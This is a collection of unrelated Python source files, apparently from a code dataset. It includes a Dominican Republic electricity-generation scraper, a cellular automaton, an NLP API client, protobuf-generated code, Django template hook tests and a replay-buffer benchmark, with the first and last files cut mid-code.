C=np.dot(np.array(Cs),np.array(self.weights))
return C
def get_V_Ex_Ey(self,x,y,get_V=1,get_Ex=1,get_Ey=1):
"""
Function for calculating the the potential and electric fields at coordinates (x,y)
Parameters
----------
x : float or list of floats
x-coordiate(s)
y : float
y-coordiate
get_V : bool, optional
V is only calculated if this flag is set to True, default: True
get_Ex : bool, optional
Ex is only calculated if this flag is set to True, default: True
get_Ey : bool, optional
Ey is only calculated if this flag is set to True, default: True
Returns
-------
list of float for V, Ex, Ey
"""
if self.C==-1:
self.get_C()
V=0
Ex=0
Ey=0
for case, component in zip(self.single, self.weights):
Vi,Exi,Eyi=case.get_V_Ex_Ey(x,y,get_V,get_Ex,get_Ey)
V+=Vi*component
#print(Vi, component)
Ex+=Exi*component
Ey+=Eyi*component
return(V,Ex,Ey)
def get_V(self,x,y):
"""
calls get_V_Ex_Ey() to calculate V
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,1,0,0)
return V
def get_Ex(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ex
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,1,0)
return Ex
def get_Ey(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ey
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,0,1)
return Ey
|
py | 1a4fc5de101873b7b8287a5837ff9de621cdb8ed | from django.shortcuts import render
import logging
from django.contrib.auth.decorators import login_required
# Create your views here.
logger = logging.getLogger('django')
@login_required
def home(request):
# logger.warning('request is processing')
return render(request, 'core/home.html', {})
|
py | 1a4fc5ffa88e4a2cdea59caf5c1d468b588a4baa | # Author:
# Adapted from code in Think Complexity, 2nd Edition, by by Allen Downey
import sys
import numpy as np
rule_width = 7
def make_table(rule_num):
"""Make the table for a given CA rule.
rule: int 0-2186
returns: array of 7 0s, 1s, and 2s
"""
rule_set = [0] * rule_width
num = rule_num
for i in range(rule_width):
rule_set[i] = num % 3
num = num // 3
rule_set.reverse()
print("number: ", rule_num)
print("rule_set:", rule_set)
return rule_set
class TotalisticCell1D:
"""Represents a 1-D, three-state, totalistic cellular automaton"""
def __init__(self, rule_num, gen_count, m=None):
"""Initializes the CA.
rule: integer
n: number of rows
m: number of columns
Attributes:
table: rule dictionary that maps from triple to next state.
array: the numpy array that contains the data.
next: the index of the next empty row.
"""
self.rule_width = 7
self.table = make_table(rule_num)
self.n = gen_count
self.width = 2 * gen_count + 1 if m is None else m
self.array = np.zeros((gen_count, self.width), dtype=np.int8)
self.next = 0
def start_single(self):
"""Starts with one cell in the middle of the top row."""
self.array[0, self.width // 2] = 1
self.next += 1
def start_random(self):
"""Start with random values in the top row."""
self.array[0] = np.random.random(self.width).round()
self.next += 1
def start_string(self, s):
"""Start with values from a string of 1s and 0s."""
s_len = len(s)
# Check string length
assert s_len <= self.width
padding_len = self.width - s_len
left_padding_len = padding_len // 2
ss = "0" * left_padding_len + s
right_padding_len = self.width - len(ss)
sss = ss + "0" * right_padding_len
self.array[0] = np.array([int(x) for x in sss])
self.next += 1
def loop(self, steps=1):
"""Executes the given number of time steps."""
for i in range(steps):
if i % 1024 == 0:
print("step {} of {}".format(i, self.n))
self.step()
def step(self):
"""Executes one time step by computing the next row of the array."""
a = self.array
i = self.next
window = [1, 1, 1]
row = self.array[i - 1]
correlated_row = np.correlate(row, window, mode="same")
next_row = np.array([self.table[7 - total - 1] for total in correlated_row])
a[i] = next_row
self.next += 1
def print_ca(self, start=0, end=None, fid=None):
"""Prints the CA.
start: index of the first column to be shown
end: index of the last column to be shown
"""
a = self.array[:, start:end]
if fid:
np.savetxt(fid, a, delimiter="", fmt='%1d', )
else:
for row in a:
print(row)
def draw_ca(rule_num, gen_count=32, fid=None, start=None):
"""Makes and prints a 1D, three-state, totalistic CA with a given rule.
rule: int rule number
n: number of rows
"""
ca = TotalisticCell1D(rule_num, gen_count)
if start is None:
ca.start_single()
else:
ca.start_string(start)
ca.loop(gen_count - 1)
ca.print_ca(fid=fid)
def write_ca(gen_count=16, start=None):
rule_num = 1635
if start is None:
file_name = "out/ca/{}_{:05d}.txt".format(rule_num, gen_count)
else:
file_name = "out/ca/{}_{:05d}_{}.txt".format(rule_num, gen_count, start)
fid = file_name
draw_ca(rule_num, gen_count, fid, start)
if __name__ == "__main__":
n = int(sys.argv[1])
if len(sys.argv) > 2:
seed = sys.argv[2]
write_ca(n, seed)
else:
write_ca(n)
|
py | 1a4fc7fc9b01df0cf3062035e942f8c7d88b04a1 | #!/usr/bin/env python3
import arrow
from bs4 import BeautifulSoup
from collections import defaultdict
import logging
from math import isnan
import numpy as np
from operator import itemgetter
import pandas as pd
import requests
# This parser gets hourly electricity generation data from oc.org.do for the Dominican Republic.
# The data is in MWh but since it is updated hourly we can view it as MW.
# Solar generation now has some data available but multiple projects are planned/under construction.
url = 'http://190.122.102.21:8084/reportesgraficos/reportepostdespacho.aspx'
total_mapping = {
u'Total T\xe9rmico': 'Thermal',
u'Total E\xf3lico': 'Wind',
u'Total Hidroel\xe9ctrica': 'Hydro',
u'Total Solar': 'Solar',
u'Total Generado': 'Generated'
}
# Power plant types
# http://www.sie.gob.do/images/Estadisticas/MEM/GeneracionDiariaEnero2017/
# Reporte_diario_de_generacion_31_enero_2017_merged2.pdf
thermal_plants = {
u'AES ANDRES': 'gas',
u'BARAHONA CARBON': 'coal',
u'BERSAL': 'oil',
u'CEPP 1': 'oil',
u'CEPP 2': 'oil',
u'CESPM 1': 'oil',
u'CESPM 2': 'oil',
u'CESPM 3': 'oil',
u'ESTRELLA DEL MAR 2 CFO': 'oil',
u'ESTRELLA DEL MAR 2 CGN': 'gas',
u'ESTRELLA DEL MAR 2 SFO': 'oil',
u'ESTRELLA DEL MAR 2 SGN': 'gas',
u'GENERACI\xD3N DE EMERGENCIA AES ANDR\xC9S': 'gas',
u'HAINA TG': 'oil',
u'INCA KM22': 'oil',
u'ITABO 1': 'coal',
u'ITABO 2': 'coal',
u'LA VEGA': 'oil',
u'LOS MINA 5': 'gas',
u'LOS MINA 6': 'gas',
u'LOS MINA 7': 'gas',
u'LOS OR\xcdGENES POWER PLANT FUEL OIL': 'oil',
u'LOS OR\xcdGENES POWER PLANT GAS NATURAL': 'gas',
u'METALDOM': 'oil',
u'MONTE RIO': 'oil',
u'PALAMARA': 'oil',
u'PALENQUE': 'oil',
u'PARQUE ENERGETICO LOS MINA CC PARCIAL': 'gas',
u'PARQUE ENERGETICO LOS MINA CC TOTAL': 'gas',
u'PIMENTEL 1': 'oil',
u'PIMENTEL 2': 'oil',
u'PIMENTEL 3': 'oil',
u'PUNTA CATALINA 1': 'coal',
u'PUNTA CATALINA 2': 'coal',
u'QUISQUEYA 1': 'gas',
u'QUISQUEYA 2': 'gas',
u'QUISQUEYA 1 SAN PEDRO': 'oil',
u'RIO SAN JUAN': 'oil',
u'SAN FELIPE': 'oil',
u'SAN FELIPE CC': 'gas',
u'SAN FELIPE VAP': 'oil',
u'SAN LORENZO 1': 'gas',
u'SAN PEDRO BIO-ENERGY': 'biomass',
u'SAN PEDRO VAPOR': 'oil',
u'SULTANA DEL ESTE': 'oil'
}
def get_data(session=None):
"""
Makes a request to source url.
Finds main table and creates a list of all table elements in string format.
Returns a list.
"""
data = []
s = session or requests.Session()
data_req = s.get(url)
soup = BeautifulSoup(data_req.content, 'lxml')
tbs = soup.find("table", id="PostdespachoUnidadesTermicasGrid_DXMainTable")
rows = tbs.find_all("td")
for row in rows:
num = row.getText().strip()
data.append(str(num))
return data
def floater(item):
"""
Attempts to convert any item given to a float. Returns item if it fails.
"""
try:
return float(item)
except ValueError:
return item
def chunker(big_lst):
"""
Breaks a big list into a list of lists. Removes any list with no data then turns remaining
lists into key: value pairs with first element from the list being the key.
Returns a dictionary.
"""
chunks = [big_lst[x:x + 27] for x in range(0, len(big_lst), 27)]
# Remove the list if it contains no data.
for chunk in chunks:
if any(chunk):
continue
else:
chunks.remove(chunk)
chunked_list = {words[0]: words[1:] for words in chunks}
return chunked_list
def data_formatter(data):
"""
Takes data and finds relevant sections. Formats and breaks data into usable parts.
Returns a nested dictionary.
"""
find_thermal_index = data.index(u'GRUPO: T\xe9rmica')
find_totals_index = data.index(u'Total T\xe9rmico')
find_totals_end = data.index(u'Total Programado')
ufthermal = data[find_thermal_index + 3:find_totals_index - 59]
total_data = data[find_totals_index:find_totals_end]
# Remove all company names.
for val in ufthermal:
if ':' in val:
i = ufthermal.index(val)
del ufthermal[i:i + 3]
formatted_thermal = chunker([floater(item) for item in ufthermal])
mapped_totals = [total_mapping.get(x, x) for x in total_data]
formatted_totals = chunker([floater(item) for item in mapped_totals])
return {'totals': formatted_totals, 'thermal': formatted_thermal}
def data_parser(formatted_data):
"""
Converts formatted data into a pandas dataframe. Removes any empty rows.
Returns a DataFrame.
"""
hours = list(range(1, 24)) + [0] + [25, 26]
dft = pd.DataFrame(formatted_data, index=hours)
dft = dft.drop(dft.index[[-1, -2]])
dft = dft.replace(u'', np.nan)
dft = dft.dropna(how='all')
return dft
def thermal_production(df, logger):
"""
Takes DataFrame and finds thermal generation for each hour.
Removes any non generating plants then maps plants to type.
Sums type instances and returns a dictionary.
"""
therms = []
unmapped = set()
for hour in df.index.values:
dt = hour
currentt = df.loc[[hour]]
# Create current plant output.
tp = {}
for item in list(df):
v = currentt.iloc[0][item]
tp[item] = v
current_plants = {k: tp[k] for k in tp if not isnan(tp[k])}
for plant in current_plants.keys():
if plant not in thermal_plants.keys():
unmapped.add(plant)
mapped_plants = [(thermal_plants.get(plant, 'unknown'), val) for plant, val in current_plants.items()]
thermalDict = defaultdict(lambda: 0.0)
# Sum values for duplicate keys.
for key, val in mapped_plants:
thermalDict[key] += val
thermalDict['datetime'] = dt
thermalDict = dict(thermalDict)
therms.append(thermalDict)
for plant in unmapped:
logger.warning(
'{} is missing from the DO plant mapping!'.format(plant),
extra={'key': 'DO'})
return therms
def total_production(df):
"""
Takes DataFrame and finds generation totals for each hour.
Returns a dictionary.
"""
vals = []
# The Dominican Republic does not observe daylight savings time.
for hour in df.index.values:
dt = hour
current = df.loc[[hour]]
hydro = current.iloc[0]['Hydro']
wind = current.iloc[0]['Wind']
solar = current.iloc[0]['Solar']
if wind > -10:
wind = max(wind, 0)
# Wind and hydro totals do not always update exactly on the new hour.
# In this case we set them to None because they are unknown rather than zero.
if isnan(wind):
wind = None
if isnan(hydro):
hydro = None
prod = {'wind': wind, 'hydro': hydro, 'solar': solar, 'datetime': dt}
vals.append(prod)
return vals
def merge_production(thermal, total):
"""
Takes thermal generation and total generation and merges them using 'datetime' key.
Returns a defaultdict.
"""
d = defaultdict(dict)
for each in (thermal, total):
for elem in each:
d[elem['datetime']].update(elem)
final = sorted(d.values(), key=itemgetter("datetime"))
def get_datetime(hour):
at = arrow.now('America/Dominica').floor('day')
dt = (at.shift(hours=int(hour) - 1)).datetime
return dt
for item in final:
i = item['datetime']
j = get_datetime(i)
item['datetime'] = j
return final
def fetch_production(zone_key='DO', session=None, target_datetime=None, logger=logging.getLogger(__name__)):
"""
Requests the last known production mix (in MW) of a given country
Arguments:
zone_key (optional) -- used in case a parser is able to fetch multiple countries
Return:
A dictionary in the form:
{
'zoneKey': 'FR',
'datetime': '2017-01-01T00:00:00Z',
'production': {
'biomass': 0.0,
'coal': 0.0,
'gas': 0.0,
'hydro': 0.0,
'nuclear': null,
'oil': 0.0,
'solar': 0.0,
'wind': 0.0,
'geothermal': 0.0,
'unknown': 0.0
},
'storage': {
'hydro': -10.0,
},
'source': 'mysource.com'
}
"""
if target_datetime:
raise NotImplementedError('This parser is not yet able to parse past dates')
dat = data_formatter(get_data(session=None))
tot = data_parser(dat['totals'])
th = data_parser(dat['thermal'])
thermal = thermal_production(th, logger)
total = total_production(tot)
merge = merge_production(thermal, total)
production_mix_by_hour = []
for hour in merge:
production_mix = {
'zoneKey': zone_key,
'datetime': hour['datetime'],
'production': {
'biomass': hour.get('biomass', 0.0),
'coal': hour.get('coal', 0.0),
'gas': hour.get('gas', 0.0),
'hydro': hour.get('hydro', 0.0),
'nuclear': 0.0,
'oil': hour.get('oil', 0.0),
'solar': hour.get('solar', 0.0),
'wind': hour.get('wind', 0.0),
'geothermal': 0.0,
'unknown': hour.get('unknown', 0.0)
},
'storage': {
'hydro': None,
},
'source': 'oc.org.do'
}
production_mix_by_hour.append(production_mix)
return production_mix_by_hour
if __name__ == '__main__':
"""Main method, never used by the Electricity Map backend, but handy for testing."""
print('fetch_production() ->')
print(fetch_production())
|
py | 1a4fc873f27d2165ade68cc9fbe4a9ce00dcfe06 | class Solution(object):
def sumZero(self, n):
"""
:type n: int
:rtype: List[int]
Generate so that two sides will add up to 1
"""
even = True if (n%2 == 0) else False
lo = (n/2)
res = []
if not even: res.append(0)
for i in range(1, lo+1):
res.append(-i)
res.append(i)
return res
z = Solution()
n = 5
print(sum(z.sumZero(n)))
|
py | 1a4fc887a87161bb829027e9e8d3cfadf40f9086 | import requests
from bytesviewapi.api_authentication import BytesApiAuth
from bytesviewapi import constants
from bytesviewapi.utils import is_valid_dict
import json
from bytesviewapi.bytesviewapi_exception import BytesviewException
class BytesviewApiClient(object):
def __init__(self, api_key=None, session=None):
""" Initializes Byteview client object for access Bytesview APIs """
"""
:param api_key: your API key.
:type api_key: string
:param session: Default value for this argument is None but if you’re making several requests to the same host,
the underlying TCP connection will be reused, which can result in a significant performance increase.
Please make sure call session.close() after execute all calls to free up resource.
:type session: requests.Session
"""
self.api_key = api_key
# BytesviewAPI request header
self.header = BytesApiAuth(api_key=self.api_key)
# Check if session argument is None
if session is None:
self.request_method = requests
else:
self.request_method = session
def sentiment_api( self, data=None, lang="en"):
""" Sending POST request to the sentiment api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en, Arabic - ar), Default laguage is english(en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.SENTIMENT_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.SENTIMENT_URL
response = self.request_method.post(constants.SENTIMENT_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def emotion_api( self, data=None, lang="en"):
""" Sending POST request to the emotion api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en), Default laguage is english(en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.EMOTION_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.EMOTION_URL
response = self.request_method.post(constants.EMOTION_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def keywords_api( self, data=None, lang="en"):
""" Sending POST request to the keywords api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en), Default laguage is english(en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.KEYWORDS_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.KEYWORDS_URL
response = self.request_method.post(constants.KEYWORDS_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def semantic_api( self, data=None, lang="en"):
""" Sending POST request to the semantic api"""
"""
:param data: Pass your both strings in the "string1" and "string2" key of the dictionary data. (ex. {"string1": "this is good", "string2": "this is great"})
:type data: dictionary
:param lang: Language Code (English - en), Default laguage is english(en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.SEMANTIC_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.SEMANTIC_URL
response = self.request_method.post(constants.SEMANTIC_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def name_gender_api( self, data=None):
""" Sending POST request to the name-gender api"""
"""
:param data: Pass your desired names in the dictionary format where each string has some unique key. (ex. {0: "ron"})
:type data: dictionary
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Make a POST request to constants.NAME_GENDER_URL
response = self.request_method.post(constants.NAME_GENDER_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def ner_api( self, data=None, lang="en"):
""" Sending POST request to the ner api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en), Default laguage is english(en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.NER_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.NER_URL
response = self.request_method.post(constants.NER_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json()
def intent_api( self, data=None, lang="en"):
""" Sending POST request to the intent api"""
"""
:param data: pass your desired strings in the dictionary format where each string has some unique key. (ex. {0: "this is good"})
:type data: dictionary
:param lang: Language Code (English - en), Default laguage is english(en)
:type lang: string
:return: server response in JSON object
"""
payload = {}
if self.api_key is None:
raise ValueError("Please provide your private API Key")
# Check if valid data dictionary
if data is not None:
if is_valid_dict(data):
payload["data"] = data
else:
raise TypeError("Data should be of type dictionary")
else:
raise ValueError("Please provide data, data can not be empty")
# Check if valid language string
if isinstance(lang, str):
if lang in constants.INTENT_LANGUAGES_SUPPORT:
payload["lang"] = lang
else:
raise ValueError("Please provide valid Language code, check documentation for supported languages")
else:
raise TypeError("Language input should be an string")
# Make a POST request to constants.INTENT_URL
response = self.request_method.post(constants.INTENT_URL, auth=self.header, timeout=300, data=json.dumps(payload, indent = 4))
# Check the status code of the response if not equal to 200, then raise exception
if response.status_code != 200:
raise BytesviewException(response.json())
# Return the response json
return response.json() |
py | 1a4fc88cb599f0d6d3cb707e248be5ea145e7227 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/argmax_matcher.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/argmax_matcher.proto',
package='object_detection.protos',
serialized_pb=_b('\n,object_detection/protos/argmax_matcher.proto\x12\x17object_detection.protos\"\xec\x01\n\rArgMaxMatcher\x12\x1e\n\x11matched_threshold\x18\x01 \x01(\x02:\x03\x30.5\x12 \n\x13unmatched_threshold\x18\x02 \x01(\x02:\x03\x30.5\x12 \n\x11ignore_thresholds\x18\x03 \x01(\x08:\x05\x66\x61lse\x12,\n\x1enegatives_lower_than_unmatched\x18\x04 \x01(\x08:\x04true\x12\'\n\x18\x66orce_match_for_each_row\x18\x05 \x01(\x08:\x05\x66\x61lse\x12 \n\x11use_matmul_gather\x18\x06 \x01(\x08:\x05\x66\x61lse')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ARGMAXMATCHER = _descriptor.Descriptor(
name='ArgMaxMatcher',
full_name='object_detection.protos.ArgMaxMatcher',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='matched_threshold', full_name='object_detection.protos.ArgMaxMatcher.matched_threshold', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=0.5,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='unmatched_threshold', full_name='object_detection.protos.ArgMaxMatcher.unmatched_threshold', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=0.5,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ignore_thresholds', full_name='object_detection.protos.ArgMaxMatcher.ignore_thresholds', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='negatives_lower_than_unmatched', full_name='object_detection.protos.ArgMaxMatcher.negatives_lower_than_unmatched', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='force_match_for_each_row', full_name='object_detection.protos.ArgMaxMatcher.force_match_for_each_row', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_matmul_gather', full_name='object_detection.protos.ArgMaxMatcher.use_matmul_gather', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=310,
)
DESCRIPTOR.message_types_by_name['ArgMaxMatcher'] = _ARGMAXMATCHER
ArgMaxMatcher = _reflection.GeneratedProtocolMessageType('ArgMaxMatcher', (_message.Message,), dict(
DESCRIPTOR = _ARGMAXMATCHER,
__module__ = 'object_detection.protos.argmax_matcher_pb2'
# @@protoc_insertion_point(class_scope:object_detection.protos.ArgMaxMatcher)
))
_sym_db.RegisterMessage(ArgMaxMatcher)
# @@protoc_insertion_point(module_scope)
|
py | 1a4fc8d5119d18d959a75277efe1b5b3ced870cd | from typing import List
from model import EmployeeModel
class EmployeeController:
"""
商品信息控制器
"""
__start_id = 1001
@classmethod
def __set_employee_id(cls, emp):
emp.eid = cls.__start_id
cls.__start_id += 1
def __init__(self):
self.__all_employee = [] # type:List[EmployeeModel]
self.__start_eid = 1001
@property
def all_employee(self):
return self.__all_employee
def add_employee(self, emp: EmployeeModel):
"""
添加商品信息
:param employee:需要添加的商品信息
"""
EmployeeController.__set_employee_id(emp)
self.__all_employee.append(emp)
def remove_employee(self, eid: int) -> bool:
"""
根据商品编号删除商品信息
:param cid:商品编号
:return:是否删除成功
"""
for i in range(len(self.__all_employee)):
if self.__all_employee[i].eid == eid:
del self.__all_employee[i]
return True
return False
def update_employee(self, commodity: EmployeeModel) -> bool:
"""
修改商品信息
:param commodity:商品信息
:return:是否删除成功
"""
for item in self.__all_employee:
if item.eid == commodity.eid:
item.__dict__ = commodity.__dict__
return True
return False
|
py | 1a4fc90071eafdfe5dffa796f2d567d5afc82e3b | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from django.template import Template, Context
from django.utils.html import mark_safe
from hooks.templatehook import hook
from hooks.templatetags.hooks_tags import template_hook_collect
from . import utils_hooks
class HookTagTest(TestCase):
def setUp(self):
self.hook_name = 'myhook'
hook.unregister_all(self.hook_name)
utils_hooks.myhook.unregister_all()
def test_hook_tag(self):
def func(context, *args, **kwargs):
self.assertEqual(args, ("foobar", ))
self.assertEqual(kwargs, {'bar': "bar", })
self.assertEqual(context['foo'], "foo")
return "hello"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' bar='bar' %}"
).render(Context({"hook_name": self.hook_name, "foo": "foo", }))
self.assertEqual(out, u"hello")
def test_hook_tag_many(self):
"""
Should join multiple responses
"""
def func_a(*args, **kwargs):
return "hello"
def func_b(*args, **kwargs):
return "goodbye"
hook.register(self.hook_name, func_a)
hook.register(self.hook_name, func_b)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "hello\ngoodbye")
def test_hook_tag_escaped(self):
"""
Should escape responses (if they are not marked as safe)
"""
def func(*args, **kwargs):
return "<span>hello</span>"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "<span>hello</span>")
def test_hook_tag_mark_safe(self):
"""
Should not escape safe strings
"""
def func(*args, **kwargs):
return mark_safe("<span>hello</span>")
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "<span>hello</span>")
def test_template_hook_collect(self):
def func(context, *args, **kwargs):
self.assertEqual(context, "context")
self.assertEqual(args, ("foo", ))
self.assertEqual(kwargs, {'extra': "bar", })
return "hello"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, u"hello")
res = template_hook_collect(utils_hooks, 'badhook')
self.assertEqual(res, u"")
def test_template_hook_collect_escaped(self):
def func(*args, **kwargs):
return "<span>hello</span>"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, "<span>hello</span>")
|
py | 1a4fc9af96a4d2b3224f423bcdf9b1ced219940c | import os
import sys
from time import time as timer
import gym
import torch
import numpy as np
import numpy.random as rd
'''
2020-0505 ZenJiaHao Github: YonV1943
Compare the running speed of different ReplayBuffer(Memory) implement.
ReplayBuffer UsedTime(s) Storage(memories)
MemoryList: 24 list()
MemoryTuple: 20 collections.namedtuple
MemoryArray: 13 numpy.array
MemoryTensor: 13 torch.tensor (GPU/CPU)
'''
class BufferList:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = len(self.memories)
def add_memo(self, memory_tuple):
self.memories.append(memory_tuple)
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert list into array'''
arrays = [list()
for _ in range(5)] # len(self.memories[0]) == 5
for index in indices:
items = self.memories[index]
for item, array in zip(items, arrays):
array.append(item)
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferTuple:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = None # init in init_after_add_memo()
from collections import namedtuple
self.transition = namedtuple(
'Transition', ('reward', 'mask', 'state', 'action', 'next_state',)
)
def add_memo(self, args):
self.memories.append(self.transition(*args))
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
